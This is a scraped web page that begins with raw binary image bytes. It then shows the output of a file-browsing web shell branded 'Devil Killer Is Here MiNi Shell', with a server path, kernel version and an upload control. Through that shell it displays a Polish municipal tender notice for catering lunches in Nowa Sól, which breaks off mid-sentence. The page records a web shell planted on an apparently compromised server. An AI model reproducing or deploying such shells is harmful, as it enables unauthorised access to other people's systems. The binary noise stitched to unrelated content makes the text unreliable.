JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20231123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20231123/0050972201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przygotowywanie oraz wydawanie lub dowóz dwudaniowych obiadów na zlecenie Miejskiego Ośrodka Pomocy Społecznej w Nowej Soli. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 006081695</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Staszica 1D</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowa Sól</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mopsnowasol.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://mopsnowasol.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przygotowywanie oraz wydawanie lub dowóz dwudaniowych obiadów na zlecenie Miejskiego Ośrodka Pomocy Społecznej w Nowej Soli. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e6e09ad6-89d6-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00509722</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00120477/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Przygotowywanie oraz wydawanie lub dowóz dwudaniowych obiadów na zlecenie Miejskiego Ośrodka Pomocy Społecznej w Nowej Soli w 2024 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-e6e09ad6-89d6-11ee-b55a-a22b2d7f700e <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu:<br/>Platformy e-Zamównienia, który dostępny jest pod adresem: https://ezamowienia.gov.pl/<br/>ePUAPu, dostępnego pod adresem https://epuap.gov.pl/wps/portal <br/>poczty elektronicznej na adres sekretariat@mopsnowasol.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w:<br/>-regulaminie i instrukcji korzystania z systemu e-Zamównienia dostępnym pod adresem https://e-zamównienial.uzp.gov.pl/komponent-edukacyjny/ <br/>warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP) dostępnych pod adresem https://www.gov.pl/web/gov/warunki-korzystania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>2.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, zamawiający informuje, że: <br/>	administratorem danych osobowych jest Miejski Ośrodek Pomocy Społecznej w Nowej Soli, ul. Stanisława Staszica 1D, 67- 100 Nowa Sól,<br/>	w sprawach związanych z Pani/Pana danymi proszę kontaktować się z Inspektorem Ochrony Danych, kontakt pisemny za pomocą poczty tradycyjnej na adres: Miejski Ośrodek Pomocy Społecznej , 67-100 Nowa Sól, <br/>ul. Stanisława Staszica 1D; lub pocztą elektroniczną na adres e-mail: m.ziemianek@mopsnowasol.pl <br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego,<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania, <br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Prawo zamówień publicznych przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, <br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Praw zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Prawo zamówień publicznych; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych - skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Prawo zamówień publicznych oraz nie może naruszać integralności protokołu oraz jego załączników,<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO – prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego,<br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OA.3201.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> – część nr 1 – obejmuje usługę przygotowywania oraz wydawania dwudaniowych obiadów na zlecenie Miejskiego Ośrodka Pomocy Społecznej w Nowej Soli w okresie 01.01.2024 r. – 31.12.2024 r. w ramach dożywiania osób dorosłych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert.<br/>1) Cena oferty (C).<br/>Ocenie podlega wskazana w formularzu oferty cena oferty brutto za wykonanie <br/>zamówienia. Oferty zostaną ocenione według wzoru: <br/>najniższa cena oferty spośród ofert <br/>niepodlegających odrzuceniu<br/> (liczba punktów oferty badanej) = ---------------------------- x 100 <br/>cena oferty badanej<br/>Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku.<br/>W przypadku złożenia oferty, której wybór prowadziłby do powstania obowiązku <br/>podatkowego zamawiającego, zgodnie z przepisami o podatku od towarów <br/>i usług w zakresie dotyczącym wewnątrzwspólnotowego nabycia towarów, <br/>zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny <br/>podatek od towarów i usług, który miałby obowiązek wpłacić zgodnie <br/>z obowiązującymi przepisami. Tak obliczona kwota będzie podstawą <br/>obliczenia punktów w kryterium oceny ofert „cena oferty”. <br/>Oferta może otrzymać maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa przygotowania oraz dowozu dwudaniowych obiadów dla uczestników Dziennego Domu „Senior +” na zlecenie Miejskiego Ośrodka Pomocy Społecznej w Nowej Soli w okresie 01.01.2024 r. – 31.12.2024 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert.<br/>1) Cena oferty (C).<br/>Ocenie podlega wskazana w formularzu oferty cena oferty brutto za wykonanie <br/>zamówienia. Oferty zostaną ocenione według wzoru: <br/>najniższa cena oferty spośród ofert <br/>niepodlegających odrzuceniu<br/> (liczba punktów oferty badanej) = ---------------------------- x 100 <br/>cena oferty badanej<br/>Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku.<br/>W przypadku złożenia oferty, której wybór prowadziłby do powstania obowiązku <br/>podatkowego zamawiającego, zgodnie z przepisami o podatku od towarów <br/>i usług w zakresie dotyczącym wewnątrzwspólnotowego nabycia towarów, <br/>zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny <br/>podatek od towarów i usług, który miałby obowiązek wpłacić zgodnie <br/>z obowiązującymi przepisami. Tak obliczona kwota będzie podstawą <br/>obliczenia punktów w kryterium oceny ofert „cena oferty”. <br/>Oferta może otrzymać maksymalnie 100 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia w części nr 2 może ubiegać się wykonawca, który spełnia <br/>następujące warunki udziału w postępowaniu;<br/>2.1 Uprawnienia do prowadzenia określonej działalności gospodarczej <br/>lub zawodowej <br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że posiada <br/>aktualną decyzję Powiatowego Inspektoratu Sanitarnego dopuszczającą wykonawcę <br/>(nazwa, adres, miejsce) do prowadzenia działalności w zakresie przygotowywania <br/>potraw od surowca do gotowej potrawy oraz przygotowywania i dostarczania <br/>żywności do odbiorców zewnętrznych (catering) w specjalnych termosach.<br/>2.2 Zdolność techniczna lub zawodowa <br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w okresie <br/>ostatnich trzech lat licząc wstecz od dnia, w którym upływa termin składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał <br/>należycie usługę gastronomiczną lub cateringową polegającą na przygotowaniu i <br/>dowozie posiłków – w przypadku usług wykonywanych i jeszcze nie zakończonych, <br/>zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że wykonywał <br/>zamówienie przez okres co najmniej trzech miesięcy.<br/><br/>Uwagi:<br/>1) W przypadku, gdy podmiot trzeci, którego potencjałem wspiera się wykonawca <br/>realizował zamówienie, w zakres którego wchodziły usługi określone wyżej wspólnie <br/>z innym podmiotem, nie ubiegającym się o udzielenie zamówienia, zamawiający <br/>wymaga, aby podmiot trzeci udostępniający potencjał wykonawcy faktycznie <br/>wykonał usługę gastronomiczną lub cateringową polegającą na przygotowaniu i <br/>dowozie posiłków.<br/>2) W przypadku, gdy zamówienie, w zakres którego wchodziły usługi, o których <br/>mowa wyżej były realizowane przez wykonawcę wspólnie z innym podmiotem, nie <br/>ubiegającym się o udzielenie zamówienia, zamawiający wymaga, aby wykonawca <br/>składający ofertę w niniejszym postępowaniu faktycznie wykonał usługę <br/>gastronomiczną lub cateringową polegającą na przygotowaniu i dowozie posiłków.<br/>3. Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie <br/>postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli <br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności <br/>zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne <br/>przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację <br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o niepodleganiu wykluczeniu z postępowania, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez zamawiającego, sporządzonego zgodnie <br/>z wzorem stanowiącym załącznik nr 7 do SWZ,<br/>− w przypadku wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia, oświadczenie składa każdy z wykonawców,<br/>− w przypadku, gdy wykonawca w celu wykazania spełniania warunków udziału <br/>w postępowaniu polega na zdolnościach lub sytuacji podmiotów <br/>udostępniających zasoby, należy dołączyć oświadczenie podmiotu <br/>udostępniającego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykonawca jest zobowiązany złożyć wraz z ofertą następujące oświadczenia <br/>i dokumenty: <br/>1.1 oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania, <br/>sporządzone zgodnie z wzorem stanowiącym załącznik nr 4 do SWZ,<br/>− w przypadku wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia, oświadczenie składa każdy z wykonawców,<br/>− w przypadku, gdy wykonawca w celu wykazania spełniania warunków udziału <br/>w postępowaniu polega na zdolnościach technicznych lub zawodowych <br/>podmiotów udostepniających zasoby, należy złożyć ponadto oświadczenie <br/>podmiotu udostępniającego zasoby,<br/>1.2 oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, <br/>sporządzone zgodnie z wzorem stanowiącym załącznik nr 5 do SWZ,<br/><br/>− w przypadku wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia, oświadczenie składa każdy z wykonawców w zakresie, w jakim <br/>każdy z wykonawców wykazuje spełnianie warunków udziału <br/>w postępowaniu, <br/>− w przypadku, gdy wykonawca w celu wykazania spełniania warunków <br/>udziału w postępowaniu polega na zdolnościach technicznych lub <br/>zawodowych podmiotów udostepniających zasoby, należy złożyć ponadto <br/>oświadczenie podmiotu udostępniającego zasoby o spełnianiu warunków <br/>udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się <br/>na jego zasoby,<br/>1.3 w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest <br/>umocowana do jego reprezentowania, odpis lub informację z Krajowego <br/>Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności <br/>Gospodarczej lub innego właściwego rejestru, <br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia, wykonawca jest zobowiązany złożyć wraz z ofertą oświadczenia <br/>i dokumenty, o których mowa w pkt 1 oraz dodatkowo następujące oświadczenia <br/>i dokumenty: <br/>2.1 oświadczenie, z którego wynika, które usługi wykonają poszczególni <br/>Nr sprawy: OA.3201.5.2023 strona 15 z 31<br/>wykonawcy, określające zakres jaki wykona każdy z wykonawców wspólnie <br/>ubiegających się o zamówienie, sporządzone zgodnie z wzorem stanowiącym <br/>załącznik nr 6 do SWZ – oświadczenie składa pełnomocnik w imieniu <br/>wszystkich wykonawców wspólnie ubiegających się o zamówienie,<br/>2.2 pełnomocnictwo do reprezentowania wykonawcy wspólnie ubiegającego się <br/>o zamówienie w postępowaniu o udzielenie zamówienia albo reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. W przypadku, gdy wykonawca w celu wykazania spełniania warunków <br/>udziału w postępowaniu polega na zdolnościach technicznych lub <br/>zawodowych podmiotów udostepniających zasoby, wykonawca jest <br/>zobowiązany złożyć wraz z ofertą oświadczenia i dokumenty, o których mowa <br/>w pkt 1 oraz dodatkowo następujące oświadczenia i dokumenty:<br/>3.1 zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do <br/>dyspozycji niezbędnych zasobów na 